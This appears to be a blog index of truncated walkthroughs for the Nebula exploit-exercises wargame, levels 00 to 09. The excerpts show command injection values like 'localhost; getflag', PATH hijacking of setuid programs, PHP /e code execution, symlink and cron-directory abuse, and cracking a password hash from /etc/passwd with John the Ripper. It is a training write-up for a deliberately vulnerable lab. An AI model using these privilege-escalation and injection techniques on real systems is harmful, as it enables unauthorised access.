Solved.tips

Level: https://exploit-exercises.com/nebula/level09/ There’s a C setuid wrapper for some vulnerable PHP code… To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09. $contents = preg_replace(“/(\[email (.*)\])/e”, “spam(\”\\2\”)”, $contents); Using the e modifier is dangerous and has been removed as of PHP 7.0.0. It allows PHP code in the second argument. There is a $useme parameter which might come in handy. So what happens is you pass it…

Read More Read More

Level: https://exploit-exercises.com/nebula/level08/ World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08. ls -la /home/flag08 What’s that capture.pcap? Lets load that in Wireshark. Lets open our Kali VM. scp level08@192.0.2.1:/home/flag08/capture.pcap ~/Downloads/ wireshark ~/Downloads/capture.pcap Open capture.pcap in Wireshark. Right click on the first entry, mouse over Follow and…

Read More Read More

Level: https://exploit-exercises.com/nebula/level07/ The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07. $host = $_[0]; print(“<html><head><title>Ping results</title></head><body><pre>”); @output = `ping -c 3 $host 2>&1`; … ping(param(“Host”)); The program allows command injection via ?Host= Lets set it to localhost; getflag But how…

Read More Read More

Level: https://exploit-exercises.com/nebula/level06/ The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. cat /etc/passwd | grep flag06 Gives us flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh Now fire up Kali because we need to use John the Ripper echo “flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh” > crack john –show crack flag06:hello:993:993::/home/flag06:/bin/sh Our password is hello Back on the Nebula system: su flag06 Password: hello getflag You have successfully…

Read More Read More

Level: https://exploit-exercises.com/nebula/level04/ Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05. cd /home/flag05 ls -la ls -la .backup cp backup-19072011.tgz ~ cd tar xvfz backup-19072011.tgz cd .ssh ssh -i id_rsa flag05@localhost getflag You have successfully executed getflag on a target account.

Level: https://exploit-exercises.com/nebula/level04/ This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04. We can bypass this check by creating a symbolic link. ln -s /home/flag04/token /home/level04/foo /home/flag04 /home/level04/foo And you’ll see the token in the output.

Level: https://exploit-exercises.com/nebula/level03/ Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03. ls -la /home/flag03 writeable.sh executes bash -x for every file in writeable.d writeable.d is world writeable so place our own file. echo “getflag > /home/flag03/flag” > /home/flag03/writeable.d/test chmod +x /home/flag03/writeable.d/test Wait…

Read More Read More

Level: https://exploit-exercises.com/nebula/level02/ There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02. “`c++ asprintf(&buffer, “/bin/echo %s is cool”, getenv(“USER”)); //command injection printf(“about to call system(\”%s\”)\n”, buffer); system(buffer); The code has a command injection vulnerability. We can exploit this by setting the environmental variable `USER` to `test; getflag` “`bash…

Read More Read More

Level: https://exploit-exercises.com/nebula/level01/ There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. ls /home/flag01 stat /home/flag01/flag01 /home/flag01/flag01 has the setuid bit set so it will run as the owner (flag01). “`c++ system(“/usr/bin/env echo and now what?”); `/usr/bin/env` tells the system to search for `echo` in **our** PATH not…

Read More Read More

Start: https://exploit-exercises.com/nebula/ Level: https://exploit-exercises.com/nebula/level00/ Download: https://exploit-exercises.com/download/ SHA256: da2e6ba445b630fd07f0bb0d2866491fc898f0429d9d380e1ebbf24f3e407d3f I used Linux/Ubuntu setting in VMWare. This level requires you to find a Set User ID program that will run as the “flag00” account. nebula login: level00 Password: level00 find / -type f -user flag00 2>/dev/null #find files owned by flag00 (ignoring errors) stat /rofs/bin/…/flag00 #check the obvious file if it has setuid /rofs/bin/…/flag00 #run it getflag #get our flag You have successfully executed getflag on a target account. -rwsr-x— The s…

Read More Read More